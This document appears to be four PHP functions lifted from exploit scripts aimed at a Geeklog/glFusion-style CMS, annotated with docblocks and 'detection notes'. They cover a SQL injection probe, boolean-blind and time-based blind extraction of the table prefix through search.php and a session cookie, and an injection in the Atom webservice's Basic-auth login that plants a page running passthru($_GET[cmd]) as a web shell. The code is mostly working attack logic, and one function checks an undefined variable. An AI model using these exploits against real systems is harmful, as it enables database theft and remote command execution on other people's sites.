Example #1
/**
 * Checks whether the target's "savepreferences" handler reacts to a
 * malformed SQL fragment.
 *
 * A single unbalanced ")" is sent as the first `blocks[]` preference value;
 * a database error in the response, as judged by chk_err() (defined
 * elsewhere on the page's source, not here), is treated as confirmation.
 *
 * Detection note: the probe is one POST with `mode=savepreferences` whose
 * `blocks[0]` value is exactly "%29" (an URL-encoded ")"); a database error
 * page returned for that request is the signal this code looks for.
 *
 * Reads globals $url, $cookies and $prefix; $host, $port and $path are
 * declared global but not used in this body. Terminates the script via
 * die() when the check fails.
 */
function run_test()
{
    global $host, $port, $path, $cookies, $url, $prefix;
    // unbalanced parenthesis: enough to break the server-side statement if it is concatenated
    $_sql = ")";
    // _s() (defined elsewhere) performs the request; third argument 1 presumably selects POST — confirm against _s()
    $out = _s($url, $cookies, 1, "mode=savepreferences&" . $prefix . "blocks[0]=" . urlencode($_sql) . "&");
    // chk_err() decides whether the response shows a database error
    if (chk_err($out)) {
        print "[*] Vulnerable!\n";
    } else {
        die("[!] Not vulnerable ...");
    }
}
Example #2
/**
 * Recovers the installation's table prefix one byte at a time through a
 * boolean-based blind injection in the `order` parameter of search.php.
 *
 * For each position $j the byte value is found by bisection over 0..255:
 * every step sends a CASE expression that selects $v[0] or $v[1] (set
 * elsewhere; presumably two ORDER BY values that yield distinguishable
 * pages), and the link extracted from the response by xtrct_lnk() is
 * compared with $_lnks[0] to read the oracle. Extraction stops once a NUL
 * byte has been appended; the literal "trackbackcodes" is then stripped so
 * only the prefix remains.
 *
 * Detection note: the injected text travels in the POST body as
 * `order=...` and contains `CASE WHEN`, `ASCII(SUBSTR(`,
 * `information_schema.TABLES` and a trailing `--`. Recovering one byte
 * costs about eight oracle requests (log2 of 256) plus one confirming
 * request, so the traffic pattern is a burst of near-identical search.php
 * POSTs.
 *
 * Depends on globals $_lnks, $v, $type, $host, $port, $path, $prepend and
 * on helpers _s(), chk_err() and xtrct_lnk() that are not on this page.
 *
 * @return string the table prefix (the recovered name minus "trackbackcodes")
 */
function find_prefix()
{
    global $_lnks, $v, $type, $host, $port, $path, $prepend;
    $_table_name = "";
    // 1-based character position handed to SUBSTR(... FROM $j FOR 1)
    $j = 1;
    print "[*] Table name -> ";
    // loop until the extracted name contains a NUL byte (end of string)
    while (!strstr($_table_name, chr(0))) {
        $mn = 0x0;
        $mx = 0xff;
        while (1) {
            // midpoint of [mn, mx] rounded down: round() rounds halves away from
            // zero, so the odd case subtracts 1 to obtain floor((mx + mn) / 2)
            if (($mx + $mn) % 2 == 1) {
                $c = round(($mx + $mn) / 2) - 1;
            } else {
                $c = round(($mx + $mn) / 2);
            }
            // oracle question "is the byte at $j >= $c?"; the hex literal
            // 0x2574...6573 decodes to "%trackbackcodes", a LIKE pattern for
            // any table name ending in that word
            $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM {$j} FOR 1)) >= " . $c . ") FROM information_schema.TABLES WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN " . $v[0] . " ELSE " . $v[1] . " END) LIMIT 1--");
            $url = "http://{$host}:{$port}" . $path . "search.php?" . $prepend . "&datestart=&dateend=1&type=" . $type . "&author=0&results=25&mode=search";
            $_d = "order=" . $sql . ";";
            $_o = _s($url, $_d);
            // a database error at this point means the information_schema lookup itself failed
            if (chk_err($_o)) {
                die("\n[!] information_schema not availiable!");
            }
            $l = xtrct_lnk($_o);
            // a link equal (loose ==) to $_lnks[0] is read as "condition true"
            if ($l == $_lnks[0]) {
                $mn = $c;
            } else {
                $mx = $c - 1;
            }
            // one or two candidates left: ask once more, this time for equality with $mn
            if ($mx - $mn == 1 or $mx == $mn) {
                $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM {$j} FOR 1)) = " . $mn . ") FROM information_schema.tables WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN " . $v[0] . " ELSE " . $v[1] . " END) LIMIT 1--");
                $url = "http://{$host}:{$port}" . $path . "search.php?" . $prepend . "&datestart=&dateend=1&type=" . $type . "&author=0&results=25&mode=search";
                $_d = "order=" . $sql . ";";
                $_o = _s($url, $_d);
                $l = xtrct_lnk($_o);
                if ($l == $_lnks[0]) {
                    print chr($mn);
                    $_table_name .= chr($mn);
                } else {
                    // not $mn, so the only other candidate $mx is taken without a further check
                    print chr($mx);
                    $_table_name .= chr($mx);
                }
                break;
            }
        }
        $j++;
    }
    print "\n";
    // the matched name ends in "trackbackcodes"; what precedes it is the prefix
    $_prefix = str_replace("trackbackcodes", "", $_table_name);
    return $_prefix;
}
Example #3
/**
 * Creates a static page through the Atom web service with the page's
 * sp_php flag set, so that the submitted page body is executed as PHP.
 *
 * The Basic-auth user name sent to the endpoint is a SQL fragment ending in
 * `LIMIT 1/*`, i.e. the authentication step is the injection point; the
 * leading part of that string is shown as `******` on this page
 * (presumably redacted by the author — cannot be confirmed from here).
 *
 * Detection note: the request this produces is a POST to
 * webservices/atom/index.php?plugin=staticpages whose Authorization header
 * decodes to a user name containing `LIMIT` and a `/*` comment, and whose
 * Atom entry carries <sp_php>1</sp_php> together with PHP source in
 * <sp_content>. A follow-up hit on staticpages/index.php?page=<id>&cmd=...
 * is the second half of the pattern.
 *
 * Depends on globals $host, $port, $path, $pwd and $prefix ($uid is declared
 * global but unused here) and on _s(), chk_err() and make_seed() defined
 * elsewhere.
 */
function sp_php()
{
    global $host, $port, $path, $pwd, $prefix, $uid;
    // rand() only picks an arbitrary page id here; no security property rests on it
    srand(make_seed());
    $id = rand(0x1, 0xffffff);
    echo "[*] id->" . $id . "\n";
    // page body that the server will run once sp_php is honoured
    $sh = "passthru(\$_GET[cmd]);";
    // always specify the namespace URI on every element
    // author's note: if the staticpages.PHP permission is not available, the server resets sp_php to 0
    $data = "<?xml version=\"1.0\"?>" . "<entry>" . "<title term=\"1\" xmlns=\"http://www.geeklog.net/xmlns/app/gl\">    </title>" . "<id xmlns=\"http://www.geeklog.net/xmlns/app/gl\">{$id}</id>" . "<sp_content xmlns=\"http://www.geeklog.net/xmlns/app/gl\">{$sh}</sp_content>" . "<sp_php xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</sp_php>" . "<gl_etag xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</gl_etag>" . "</entry>";
    // user name for Basic auth; built from the table prefix recovered earlier
    $usr = "******" . $prefix . "users LIMIT 1/*";
    $url = "http://{$host}:{$port}" . $path . "webservices/atom/index.php?plugin=staticpages";
    // second argument is the base64 "user:password" credential pair _s() sends — confirm against _s()
    $out = _s($url, base64_encode($usr . ":" . $pwd), 1, $data);
    // chk_err() (defined elsewhere) decides between reporting a SQL error and printing the page URL
    if (chk_err($_o)) {
        print "[*] Sql error.";
    } else {
        print "[*] Done! Visit->http://{$host}:{$port}" . $path . "staticpages/index.php?page={$id}&cmd=ls%20-la";
    }
}
Example #4
/**
 * Recovers the table prefix through a time-based blind injection carried in
 * the glf_session cookie, reading the table name backwards one byte at a time.
 *
 * $j starts at -15 and decreases; SUBSTR(... FROM $j FOR 1) with a negative
 * position counts from the end of the string in MySQL, and -15 is the byte
 * just before the 14-character suffix "trackbackcodes" (the hex literal in
 * the query decodes to "%trackbackcodes"). Each recovered byte is therefore
 * prepended. The byte value is found by bisection over 0..255, and the
 * oracle is the request's wall-clock duration: a response that took at
 * least $n seconds (the true branch evaluates $delayfunc) is read as
 * "condition true". Extraction ends when the equality check yields a zero
 * byte.
 *
 * Detection note: every oracle step performs a fresh login() and then sends
 * a Cookie header whose glf_session value contains `AND (CASE WHEN`,
 * `information_schema.TABLES` and a `-- ` comment, alongside a second cookie
 * `glfusion=9999999999`; the traffic pattern is a burst of logins followed
 * by requests that alternate between fast and roughly $n-second responses.
 *
 * Depends on globals $host, $port, $path, $delayfunc and $n ($_user and
 * $_pwd are declared global but not read here) and on login(), _s() and
 * chk_err() defined elsewhere. Relies on $null_f being unset, hence falsy,
 * on entry.
 *
 * @return string the recovered table prefix
 */
function find_prefix()
{
    global $host, $port, $path, $delayfunc, $_user, $_pwd, $n;
    $_tn = "TABLE_NAME";
    // author's open question: whether identifier case matters here (unverified)
    $_ift = "information_schema.TABLES";
    // same question for the schema-qualified table name
    $_table_prefix = "";
    print "[*] Initiating table prefix extraction...\n";
    // negative SUBSTR position: walk the table name from its end, starting just before "trackbackcodes"
    $j = -15;
    // $null_f is never initialised; it is only set once a zero byte is reached
    while (!$null_f) {
        $mn = 0x0;
        $mx = 0xff;
        while (1) {
            // floor((mx + mn) / 2): round() rounds halves away from zero, so the odd case subtracts 1
            if (($mx + $mn) % 2 == 1) {
                $c = round(($mx + $mn) / 2) - 1;
            } else {
                $c = round(($mx + $mn) / 2);
            }
            // fresh session for every probe; the injected fragment rides in the session cookie value
            $sessid = login();
            // oracle question "is the byte at $j >= $c?": the true branch runs $delayfunc, the false branch returns 0 at once
            $sql = " AND (CASE WHEN (SELECT (ASCII(SUBSTR(" . $_tn . " FROM {$j} FOR 1)) >= " . $c . ") FROM " . $_ift . " WHERE " . $_tn . " LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN {$delayfunc} ELSE 0 END) ) LIMIT 1-- ";
            $cookies = "glf_session={$sessid}" . $sql . "; glfusion=9999999999;";
            $url = "http://{$host}:{$port}" . $path;
            // time() has one-second resolution, hence the "> $n - 1" threshold used below
            $starttime = time();
            $_o = _s($url, $cookies, 0, "");
            $endtime = time();
            $difftime = $endtime - $starttime;
            // a database error means the information_schema query itself failed
            if (chk_err($_o)) {
                die("\n[!] information_schema not availiable! MySQL < 5.0");
            }
            // slow response => condition held; the extra sleep is presumably to let the server-side delay drain — TODO confirm
            if ($difftime > $n - 1) {
                $mn = $c;
                sleep($n);
            } else {
                $mx = $c - 1;
            }
            // one or two candidates left: confirm equality with $mn via a second timed request
            if ($mx - $mn == 1 or $mx == $mn) {
                $sessid = login();
                $sql = " AND (CASE WHEN (SELECT (ASCII(SUBSTR(" . $_tn . " FROM {$j} FOR 1)) = " . $mn . ") FROM " . $_ift . " WHERE " . $_tn . " LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN {$delayfunc} ELSE 0 END) ) LIMIT 1-- ";
                $cookies = "glf_session={$sessid}" . $sql . "; glfusion=9999999999;";
                $url = "http://{$host}:{$port}" . $path;
                $starttime = time();
                $_o = _s($url, $cookies, 0, "");
                $endtime = time();
                $difftime = $endtime - $starttime;
                if ($difftime > $n - 1) {
                    if ($mn != 0) {
                        // byte confirmed: prepend, because the name is read right-to-left
                        $_table_prefix = chr($mn) . $_table_prefix;
                    } else {
                        // a zero byte marks the start of the name; stop the outer loop
                        $null_f = true;
                    }
                } else {
                    // not $mn, so the only other candidate $mx is taken without a further check
                    $_table_prefix = chr($mx) . $_table_prefix;
                }
                if (!$null_f) {
                    print "[?] Table prefix->[??]" . $_table_prefix . "\n";
                }
                sleep($n);
                break;
            }
        }
        // move one character further towards the start of the name
        $j--;
    }
    print "[?] Table prefix->" . $_table_prefix . "\n";
    return $_table_prefix;
}